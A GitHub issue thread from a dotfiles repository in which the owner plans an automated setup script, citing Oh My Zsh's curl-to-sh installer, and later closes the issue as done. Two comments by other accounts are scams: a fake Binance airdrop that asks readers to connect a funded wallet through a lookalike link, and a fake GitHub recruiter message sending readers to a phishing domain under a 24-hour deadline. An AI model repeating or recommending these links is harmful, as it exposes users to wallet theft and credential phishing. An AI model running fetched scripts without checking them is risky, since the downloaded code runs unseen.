### ISSUE TITLE
Provide a shell script for setting up dotfiles automatically

### ISSUE THREAD

**Issue by mu-hun** [x86chi/.dotfiles#3]
When setting up dotfiles on a new device, I've always found that copying and pasting multi-line commands is quite cumbersome.

Many Unix-based tools allow you to automatically install dependencies and configure them to suit your environment. For instance, [Oh My Zsh](https://ohmyz.sh/#install):

```
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
```

It would be beneficial to have an automation script that clones this repo and executes all the initial setup commands.

Additionally, if the client is on macOS, we could have a script that automatically installs `brew` and `brew cask` apps, sets up iterm2 configurations, and installs app store apps.

**Comment by mu-hun** [comment]
## MacOS related TODO

- Backup system preferences and write it restore script with https://github.com/clintmod/macprefs
- Write a https://github.com/kiding/SokIM  IME install and setup script.
  - Remove default English (US) input source.

**Comment by MatMarrr** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @shanmugharajk, @tuusberg, @slopez-z, @vora-arpit, @themlstudent, @7073495362, @PatrickCmd

**Comment by raviikushh** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
jesusxy, @sakshamji, @Jayashakthi28, @ajayfaul, @0xIvi, @Malaccoda, @louyongjiu, @uskhan-lab, @beauji1116jbn, @kingvhit, @TA2002, @mohdxnizamv, @jacky2020hor, @rezasmind, @GunjanSurti, @lcnvdl, @dukenst2006, @Spryzen369, @alexander-gekov, @Akramz

**Comment by mu-hun** [comment]
I've start this job at 36f18123763b987509ba9c7dea80da8508839ea9

- [x] I don't know whether to run it with 'sh' or 'bash'. First of all, I used `source` for instant excution and chose bash by `#!/usr/bin/env bash` hashbang into all script files.
- [x] Brew-related tasks must be bundled into a brewfile.

**Comment by mu-hun** [comment]
Upper comment issues was resolved. I've close this page.
